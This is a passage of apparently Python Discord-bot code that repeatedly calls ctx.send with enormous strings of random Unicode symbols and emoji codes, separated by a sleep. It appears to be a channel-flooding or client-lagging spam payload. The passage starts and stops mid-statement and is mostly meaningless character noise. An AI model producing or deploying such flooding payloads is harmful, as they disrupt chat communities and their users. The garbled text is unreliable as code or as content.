:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤
͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ
஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_s
unny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await 